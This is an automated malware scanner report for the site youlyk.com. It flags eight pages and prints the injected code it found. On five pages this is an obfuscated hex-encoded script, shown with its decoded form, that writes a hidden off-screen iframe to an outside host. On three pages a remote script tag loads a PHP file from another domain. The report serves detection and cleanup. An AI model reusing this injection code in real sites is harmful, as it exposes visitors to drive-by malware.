New scan:

Malware Scanner report for youlyk.com

Malicious/Suspicious/Total urls checked
5/3/15
8 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.youlyk.com/
200 OK
Content-Length: 12638
Content-Type: text/html
clean
http://www.youlyk.com/js/jquery-1.4.2.js
200 OK
Content-Length: 163855
Content-Type: application/x-javascript
clean
http://www.youlyk.com/js/slider.js
200 OK
Content-Length: 1022
Content-Type: application/x-javascript
clean
http://www.youlyk.com/js/changimages.js
200 OK
Content-Length: 9714
Content-Type: application/x-javascript
clean
http://www.youlyk.com/images/js/dropdown.js
200 OK
Content-Length: 5547
Content-Type: application/x-javascript
clean
http://www.youlyk.com/html/guanyuyouyi/youyijianjie/
200 OK
Content-Length: 11643
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095667"></script>

http://www.youlyk.com/js/jquery.js
200 OK
Content-Length: 47514
Content-Type: application/x-javascript
clean
http://www.youlyk.com/js/s3Slider.js
200 OK
Content-Length: 4224
Content-Type: application/x-javascript
clean
http://www.youlyk.com/html/gongsidongtai/
200 OK
Content-Length: 6227
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]);

Decoded script:


<style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-BQC [Trj]

http://www.youlyk.com/html/shipintiandi/
200 OK
Content-Length: 21983
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]);

Decoded script:


<style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-BQC [Trj]

http://www.youlyk.com/html/jiachangzuofa/
200 OK
Content-Length: 13204
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]);

Decoded script:


<style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-BQC [Trj]

http://www.youlyk.com/html/jiaruyouyi/
200 OK
Content-Length: 7497
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]);

Decoded script:


<style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-BQC [Trj]

http://www.youlyk.com/html/lianxiwomen/
200 OK
Content-Length: 6726
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _0xe91d=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x73\x6F\x6D\x65\x74\x68\x69\x6E\x67\x3F\x6E\x65\x77\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe91d[1]](_0xe91d[0]);document[_0xe91d[1]](_0xe91d[2]);

Decoded script:


<style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-BQC [Trj]

http://www.youlyk.com/html/guanyuyouyi/zizhirongyu/
200 OK
Content-Length: 9014
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095669"></script>

http://www.youlyk.com/html/guanyuyouyi/guanlituandui/
200 OK
Content-Length: 9663
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://sepino-altilia.it/l4j6nwqg.php?id=1095663"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: youlyk.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: youlyk.com
Referer: http://www.google.com/search?q=youlyk.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=youlyk.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://youlyk.com/

Result: youlyk.com is not infected or malware details are not published yet.